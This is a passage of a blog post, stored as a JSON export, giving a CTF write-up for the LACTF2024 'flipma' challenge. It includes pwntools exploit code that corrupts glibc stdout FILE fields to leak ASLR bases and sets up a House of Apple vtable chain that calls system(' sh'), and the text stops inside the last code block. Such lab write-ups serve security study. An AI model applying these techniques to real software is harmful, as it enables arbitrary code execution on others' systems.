{"id":3359,"date":"2025-04-20T14:05:03","date_gmt":"2025-04-20T05:05:03","guid":{"rendered":"https:\/\/h4ck.kr\/?p=3359"},"modified":"2025-04-20T14:32:43","modified_gmt":"2025-04-20T05:32:43","slug":"lactf2024-flipma","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=3359","title":{"rendered":"[LACTF2024] flipma"},"content":{"rendered":"\n<h3 class=\"wp-block-heading\">checksec<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">seo@seo:~\/study\/LACTF2024\/flipma$ checksec .\/flipma\n[*] '\/home\/seo\/study\/LACTF2024\/flipma\/flipma'\n    Arch:       amd64-64-little\n    RELRO:      Full RELRO\n    Stack:      Canary found\n    NX:         NX enabled\n    PIE:        PIE enabled\n    SHSTK:      Enabled\n    IBT:        Enabled\n    Stripped:   No<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Docker configure<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo docker build . 
-t flipma\nsudo docker run -it --rm --privileged --security-opt seccomp=unconfined -p 1337:1337 flipma sh<\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Host<\/li>\n<\/ul>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">seo@seo:~\/study\/LACTF2024\/flipma$ nc -lp 1338 > libc.so.6\n\nseo@seo:~\/study\/LACTF2024\/flipma$ nc -lp 1338 > ld-linux-x86-64.so.2<\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Guest<\/li>\n<\/ul>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">\/lib # cat libc.so.6 | nc 172.17.0.1 1338\n\n\/lib # cat ld-linux-x86-64.so.2  | nc 172.17.0.1 1338<\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li><s>Ubuntu 20.04 environment needed<\/s> <s>Going with building the environment in Docker\u2026<\/s> Switched to an Ubuntu 20.04 LTS environment<\/li>\n<\/ul>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">seo@seo:~\/study\/LACTF2024\/flipma$ strings -tx .\/flipma\n...\n   3014 GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0\n...<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Dropbear\/gdbserver in Docker<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo docker build . 
-t flipma\nsudo docker run -it --rm --privileged --security-opt seccomp=unconfined -p 1337:1337 -p 22222:22222 -p 12345:1234 flipma sh<\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Guest<\/li>\n<\/ul>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">cd \/bin \n \nnc -lvp 1337 > gdbserver\n \nnc -lvp 1337 > gdb\n \nnc -lvp 1337 > dropbearmulti\n\nln -sf dropbearmulti dropbear\nln -sf dropbearmulti dbclient\nln -sf dropbearmulti dropbearkey\nln -sf dropbearmulti dropbearconvert\nln -sf dropbearmulti ssh\n\nmkdir -p \/etc\/dropbear\ndropbearkey -t rsa   -f \/etc\/dropbear\/dropbear_rsa_host_key\ndropbearkey -t dss   -f \/etc\/dropbear\/dropbear_dss_host_key\ndropbearkey -t ecdsa -f \/etc\/dropbear\/dropbear_ecdsa_host_key\nchmod 600 \/etc\/dropbear\/*\n\npasswd root\n#0000\n\ndropbear -p 22222<\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Host<\/li>\n<\/ul>\n\n\n\n<p>Download links for statically built gdb, gdbserver, and dropbearmulti<br><a href=\"https:\/\/github.com\/guyush1\/gdb-static\/releases\/tag\/v16.2-static\">https:\/\/github.com\/guyush1\/gdb-static\/releases\/tag\/v16.2-static<\/a><br><a href=\"https:\/\/bitfab.org\/dropbear-static-builds\">https:\/\/bitfab.org\/dropbear-static-builds<\/a><\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">cat gdbserver | nc 127.0.0.1 1337\n\ncat gdb | nc 127.0.0.1 1337\n\ncat dropbearmulti | nc 127.0.0.1 1337<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Running prob in Docker<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" 
data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">while true;\ndo\nnc -lvp 1337 -e \/srv\/app\/run\ndone<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Decompile src<\/h3>\n\n\n\n<h3 class=\"wp-block-heading\">main<\/h3>\n\n\n\n<p>flip keeps getting called depending on the value of flips.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">int __fastcall main(int argc, const char **argv, const char **envp)\n{\n  setbuf(stdin, 0);\n  setbuf(stdout, 0);\n  while ( flips > 0 )\n    flip();\n  puts(\"no more flips\");\n  return 0;\n}<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">flip<\/h3>\n\n\n\n<p>Each call to flip decrements flips at the end. The global flips starts at 4, so flip can be called 4 times in total.<\/p>\n\n\n\n<p>The values a and b are stored in v1 and v2 respectively. 
<br>It adds <code>v1<\/code> to the address of <code>stdin-&gt;_flags<\/code>, then XORs the byte at the resulting address with 1 shifted left by <code>v2<\/code>.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">int flip()\n{\n  __int64 v1; \/\/ [rsp+10h] [rbp-10h]\n  unsigned __int64 v2; \/\/ [rsp+18h] [rbp-8h]\n\n  write(1, \"a: \", 3u);\n  v1 = readint();\n  write(1, \"b: \", 3u);\n  v2 = readint();\n  if ( v2 >= 8 )\n    return puts(\"we're flipping bits, not burgers\");\n  *((_BYTE *)&amp;stdin->_flags + v1) ^= 1 &lt;&lt; v2;\n  return --flips;\n}\n\n__int64 readint()\n{\n  char buf[24]; \/\/ [rsp+0h] [rbp-20h] BYREF\n  unsigned __int64 v2; \/\/ [rsp+18h] [rbp-8h]\n\n  v2 = __readfsqword(0x28u);\n  read(0, buf, 16u);\n  return atol(buf);\n}<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Analysis<\/h3>\n\n\n\n<p><strong>Environment: the leak did not work, so switched to Ubuntu 20.04 LTS.<\/strong><\/p>\n\n\n\n<p>The FILE structure.<\/p>\n\n\n\n<p><code>$ cat \/usr\/include\/x86_64-linux-gnu\/bits\/types\/struct_FILE.h<\/code><\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">struct _IO_FILE\n{\n  int _flags;           \/* High-order word is _IO_MAGIC; rest is flags. *\/\n\n  \/* The following pointers correspond to the C++ streambuf protocol. *\/\n  char *_IO_read_ptr;   \/* Current read pointer *\/\n  char *_IO_read_end;   \/* End of get area. 
*\/\n  char *_IO_read_base;  \/* Start of putback+get area. *\/\n  char *_IO_write_base; \/* Start of put area. *\/\n  char *_IO_write_ptr;  \/* Current put pointer. *\/\n  char *_IO_write_end;  \/* End of put area. *\/\n  char *_IO_buf_base;   \/* Start of reserve area. *\/\n  char *_IO_buf_end;    \/* End of reserve area. *\/\n\n  \/* The following fields are used to support backing up and undo. *\/\n  char *_IO_save_base; \/* Pointer to start of non-current get area. *\/\n  char *_IO_backup_base;  \/* Pointer to first valid character of backup area *\/\n  char *_IO_save_end; \/* Pointer to end of non-current get area. *\/\n\n  void *_markers;\n\n  void *_chain;\n\n  int _fileno;\n  int _flags2;\n  uint64_t _old_offset; \/* This used to be _offset but it's too small.  *\/\n\n  \/* 1+column number of pbase(); 0 is unknown. *\/\n  unsigned short _cur_column;\n  signed char _vtable_offset;\n  char _shortbuf[1];\n\n  void *_lock;\n  uint64_t _offset;\n  \/* Wide character stream stuff.  *\/\n  void *_codecvt;\n  void *_wide_data;\n  void *_freeres_list;\n  void *_freeres_buf;\n  size_t __pad5;\n  int _mode;\n  \/* Make sure we don't get into trouble again.  
*\/\n  char _unused2[20];\n};<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">gef\u27a4  p *(FILE *)0x00007ffff7fb1980\n$3 = {\n  _flags = 0xfbad208b,\n  _IO_read_ptr = 0x7ffff7fb1a03 &lt;_IO_2_1_stdin_+131> \"\",\n  _IO_read_end = 0x7ffff7fb1a03 &lt;_IO_2_1_stdin_+131> \"\",\n  _IO_read_base = 0x7ffff7fb1a03 &lt;_IO_2_1_stdin_+131> \"\",\n  _IO_write_base = 0x7ffff7fb1a03 &lt;_IO_2_1_stdin_+131> \"\",\n  _IO_write_ptr = 0x7ffff7fb1a03 &lt;_IO_2_1_stdin_+131> \"\",\n  _IO_write_end = 0x7ffff7fb1a03 &lt;_IO_2_1_stdin_+131> \"\",\n  _IO_buf_base = 0x7ffff7fb1a03 &lt;_IO_2_1_stdin_+131> \"\",\n  _IO_buf_end = 0x7ffff7fb1a04 &lt;_IO_2_1_stdin_+132> \"\",\n  _IO_save_base = 0x0,\n  _IO_backup_base = 0x0,\n  _IO_save_end = 0x0,\n  _markers = 0x0,\n  _chain = 0x0,\n  _fileno = 0x0,\n  _flags2 = 0x0,\n  _old_offset = 0xffffffffffffffff,\n  _cur_column = 0x0,\n  _vtable_offset = 0x0,\n  _shortbuf = \"\",\n  _lock = 0x7ffff7fb37f0 &lt;_IO_stdfile_0_lock>,\n  _offset = 0xffffffffffffffff,\n  _codecvt = 0x0,\n  _wide_data = 0x7ffff7fb1a60 &lt;_IO_wide_data_0>,\n  _freeres_list = 0x0,\n  _freeres_buf = 0x0,\n  __pad5 = 0x0,\n  _mode = 0x0,\n  _unused2 = '\\000' &lt;repeats 19 times>\n}<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Modification 1.<\/h3>\n\n\n\n<p>Modify the byte at _IO_2_1_stdout + 0x1<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sla(\"a: \", str(0xD21))\nsla(\"b: \", str(3))<\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"749\" height=\"110\" 
src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-53.png\" alt=\"\" class=\"wp-image-3360\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-53.png 749w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-53-300x44.png 300w\" sizes=\"auto, (max-width: 749px) 100vw, 749px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"751\" height=\"547\" src=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-54.png\" alt=\"\" class=\"wp-image-3361\" srcset=\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-54.png 751w, https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/04\/image-54-300x219.png 300w\" sizes=\"auto, (max-width: 751px) 100vw, 751px\" \/><\/figure>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">>>> hex(0x20 ^ (1 &lt;&lt; 3))\n'0x28'<\/pre>\n\n\n\n<p>_IO_2_1_stdout_\u2192_flags<br>0x00000000fbad<strong>20<\/strong>87 \u2192 0x00000000fbad<strong>28<\/strong>87<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">gef\u27a4   x\/gx 0x00007ffff7fb1980+0xd20\n0x7ffff7fb26a0 &lt;_IO_2_1_stdout_>:       0x00000000fbad2887<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">\uc218\uc8152.<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sla(\"a: \", str(0xD21))\nsla(\"b: \", str(4))<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" 
data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">>>> hex(0x28 ^ (1 &lt;&lt; 4))\n'0x38'<\/pre>\n\n\n\n<p>_IO_2_1_stdout_\u2192_flags<br>0x00000000fbad<strong>28<\/strong>87 \u2192 0x00000000fbad<strong>38<\/strong>87<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">gef\u27a4  x\/gx 0x00007ffff7fb1980+0xd20\n0x7ffff7fb26a0 &lt;_IO_2_1_stdout_>:       0x00000000fbad3887<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Modification 3.<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sla(\"a: \", str(0xD41))\nsla(\"b: \", str(5))<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">>>> hex(0x27 ^ (1 &lt;&lt; 5))\n'0x7'<\/pre>\n\n\n\n<p>_IO_2_1_stdout_\u2192_IO_write_base<br>Before: _IO_write_base = 0x7ffff7fb<strong>27<\/strong>23 &lt;_IO_2_1_stdout_+131&gt; &#8220;&#8221;,<br>After: _IO_write_base = 0x7ffff7fb<strong>07<\/strong>23 &lt;xdrstdio_ops+35&gt; &#8220;\\367\\377\\177&#8221;,<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Modification 4. 
(effectively no modification)<\/h3>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sla(\"a: \", str(0xD41))\nsla(\"b: \", str(-1))<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">puts(\"we're flipping bits, not burgers\") + (LEAK)<\/pre>\n\n\n\n<p>Before:<br>_IO_write_base = 0x7ffff7fb0723 &lt;xdrstdio_ops+35&gt; &#8220;\\367\\377\\177&#8221;,<\/p>\n\n\n\n<p>After puts:<br>_IO_write_base = 0x7ffff7fb2723 &lt;_IO_2_1_stdout_+131&gt; &#8220;\\n&#8221;,<\/p>\n\n\n\n<p><code>_flags<\/code>&nbsp;= 0xfbad3887 ( 0xfbad2887 |&nbsp;<code>_IO_IS_APPENDING<\/code>)<br>_IO_write_base = 0x7ffff7fb0723, so the leak starts from that address.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">new_do_write<\/h3>\n\n\n\n<p>libc 2.31-0ubuntu9.17 source code link:<br><a href=\"https:\/\/launchpad.net\/ubuntu\/%2Bsource\/glibc\/2.31-0ubuntu9.17?utm_source=chatgpt.com\">https:\/\/launchpad.net\/ubuntu\/%2Bsource\/glibc\/2.31-0ubuntu9.17?utm_source=chatgpt.com<\/a><\/p>\n\n\n\n<p>When the <code>_IO_IS_APPENDING (0x1000)<\/code> flag is set,<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">static size_t\nnew_do_write (FILE *fp, const char *data, size_t to_do)\n{\n  size_t count;\n  if (fp->_flags &amp; _IO_IS_APPENDING)\n    \/* On a system without a proper O_APPEND implementation,\n       you would need to sys_seek(0, SEEK_END) here, 
but is\n       not needed nor desirable for Unix- or Posix-like systems.\n       Instead, just indicate that offset (before and after) is\n       unpredictable. *\/\n    fp->_offset = _IO_pos_BAD;\n  else if (fp->_IO_read_end != fp->_IO_write_base)\n    {\n      off64_t new_pos\n\t= _IO_SYSSEEK (fp, fp->_IO_write_base - fp->_IO_read_end, 1);\n      if (new_pos == _IO_pos_BAD)\n\treturn 0;\n      fp->_offset = new_pos;\n    }\n  count = _IO_SYSWRITE (fp, data, to_do);\n  if (fp->_cur_column &amp;&amp; count)\n    fp->_cur_column = _IO_adjust_column (fp->_cur_column - 1, data, count) + 1;\n  _IO_setg (fp, fp->_IO_buf_base, fp->_IO_buf_base, fp->_IO_buf_base);\n  fp->_IO_write_base = fp->_IO_write_ptr = fp->_IO_buf_base;\n  fp->_IO_write_end = (fp->_mode &lt;= 0\n\t\t       &amp;&amp; (fp->_flags &amp; (_IO_LINE_BUF | _IO_UNBUFFERED))\n\t\t       ? fp->_IO_buf_base : fp->_IO_buf_end);\n  return count;\n}<\/pre>\n\n\n\n<p>The contents starting at <code>_IO_2_1_stdout_-&gt;_IO_write_base<\/code> are leaked<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">count = _IO_SYSWRITE (fp, \\\n_IO_2_1_stdout_->_IO_write_base, \\\n_IO_2_1_stdout_->_IO_write_ptr - _IO_2_1_stdout_->_IO_write_base); <\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Defeat ASLR<\/h3>\n\n\n\n<p>The leak starts at _IO_write_base = 0x7ffff7fb0723.<br>With ASLR removed, that is 00000000001EB723.<\/p>\n\n\n\n<p>Adding 0x825 to this gives the address of the stdout GOT entry.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">.got:00000000001EBF48 stdout_ptr      dq offset stdout        ; DATA XREF: 
vprintf+4\u2191r\n.got:00000000001EBF48                                         ; printf+91\u2191r ...<\/pre>\n\n\n\n<p>That entry in turn points to stdout inside the flipma binary.<br>Subtracting 0x4020 gives the flipma base address.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">gef\u27a4  p\/x 0x007ffff7dc5000 + 0x0000000001EBF48\n$3 = 0x7ffff7fb0f48\ngef\u27a4  x\/gx 0x7ffff7fb0f48\n0x7ffff7fb0f48: 0x0000555555558020\ngef\u27a4  p\/x 0x0000555555558020-0x00555555554000\n$4 = 0x4020<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">.bss:0000000000004020                 public stdout@@GLIBC_2_2_5\n.bss:0000000000004020 ; FILE *stdout\n.bss:0000000000004020 stdout@@GLIBC_2_2_5 dq ?                
; DATA XREF: main+1C\u2191r\n.bss:0000000000004020                                         ; LOAD:00000000000051D8\u2193o\n.bss:0000000000004020                                         ; Alternative name is 'stdout'\n.bss:0000000000004020                                         ; Copy of shared data\n<\/pre>\n\n\n\n<p>For the libc base, take the value at leak start + 5 and subtract 0x157f10.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">.data.rel.ro:00000000001EB720                 dq offset sub_157F30\n.data.rel.ro:00000000001EB728                 dq offset sub_157F10<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sla(\"a: \", str(0xD21))\nsla(\"b: \", str(3))\n\nsla(\"a: \", str(0xD21))\nsla(\"b: \", str(4))\n\nsla(\"a: \", str(0xD41))\nsla(\"b: \", str(5))\n\nsla(\"a: \", str(0xD41))\nsla(\"b: \", str(-1))\n\nleak = p.recvuntil(b\"we're\")\nlibc_base = u64(leak[5:5+8]) - 0x157f10 \nbin_base = u64(leak[0x825:0x825+8]) - 0x4020\nsuccess(f\"libc_base: {hex(libc_base)}\")\nsuccess(f\"bin_base: {hex(bin_base)}\")<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">seo@ubuntu:~\/study\/LACTF2024\/flipma$ python3 solve.py\n[+] Starting local process '.\/flipma': pid 6991\n[+] libc_base: 0x7ffff7dc5000\n[+] bin_base: 0x555555554000\n[*] Switching to interactive mode\n flipping bits, not burgers\na: $<\/pre>\n\n\n\n<h3 
class=\"wp-block-heading\">Increase flips count<\/h3>\n\n\n\n<p>Before flips: 0x1<br>After flips: 0x81 (=129)<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">flips = bin_base + e.symbols[\"flips\"]\nlibc_stdin = libc_base + l.symbols[\"_IO_2_1_stdin_\"]\nsuccess(f\"flips: {hex(flips)}\")\nsuccess(f\"stdin: {hex(libc_stdin)}\")\n\nsla(\"a: \", str(flips - libc_stdin))\nsla(\"b: \", str(7))<\/pre>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">>>> (0x1 ^ (1 &lt;&lt; 7))\n129<\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">House of Apple by <strong>roderick01<\/strong><\/h3>\n\n\n\n<p><strong>1. \uac00\uc9dc <code>_wide_vtable<\/code> \uc0dd\uc131<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\uc704\uce58: <code>chunk_addr + 0x100<\/code><\/li>\n\n\n\n<li><code>__doallocate<\/code>\uc758 \uc624\ud504\uc14b\uc740 <code>0x68<\/code>\uc774\ubbc0\ub85c, <code>chunk_addr + 0x100 + 0x68<\/code>\uc5d0 <code>system<\/code> \uc8fc\uc18c\ub97c \uc800\uc7a5<\/li>\n<\/ul>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\"># (struct _IO_FILE_plus *)->_wide_data = new_vtable\naaw(libc_stdout + 0xA0, new_vtable, libc_base + 0x1EC880)\n# (struct _IO_jump_t *)->__doallocate = system\naaw(new_vtable + 0x168, libc_base+l.symbols[\"system\"], 0)<\/pre>\n\n\n\n<p><strong>2. 
Create a fake <code>_wide_data<\/code><\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Location: <code>chunk_addr<\/code><\/li>\n\n\n\n<li><code>chunk_addr-&gt;_wide_vtable<\/code> \u2192 <code>chunk_addr + 0x100<\/code> (address of the fake vtable)<\/li>\n<\/ul>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\"># (struct _IO_wide_data*)->_wide_vtable = new_vtable + 0x100\naaw(new_vtable + 0xE0, new_vtable + 0x100, 0)<\/pre>\n\n\n\n<p><strong>3. Set the other <code>stderr<\/code> fields<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Set <code>stderr-&gt;vtable<\/code> \u2192 <code>_IO_wfile_jumps<\/code>\n<ul class=\"wp-block-list\">\n<li>As a result, <code>_IO_wfile_overflow<\/code> is called instead of the original <code>_IO_new_file_overflow<\/code><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\"># (struct _IO_FILE_plus *)->vtable = _IO_wfile_jumps\naaw(libc_stdout + 0xD8, libc_wfile_jumps, libc_file_jumps)<\/pre>\n\n\n\n<p><strong>4. 
Set <code>stderr-&gt;_flags<\/code> appropriately<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Key points:\n<ul class=\"wp-block-list\">\n<li>In the end, <code>wide_vtable-&gt;__doallocate(stderr)<\/code> \u2192 <code>system(stderr)<\/code> is called<\/li>\n\n\n\n<li>That is, <code>stderr-&gt;_flags<\/code> is used as the start of the string passed as the argument to <code>system<\/code><\/li>\n<\/ul>\n<\/li>\n\n\n\n<li>Trick for running the desired command while still satisfying the conditions:\n<ul class=\"wp-block-list\">\n<li><strong>roderick01<\/strong>'s approach:\n<ul class=\"wp-block-list\">\n<li>Set <code>_flags<\/code> to <code>\" sh\"<\/code> (a string with two leading spaces)<\/li>\n\n\n\n<li>Conditions satisfied + <code>system(\" sh\")<\/code> is called<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"python\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" 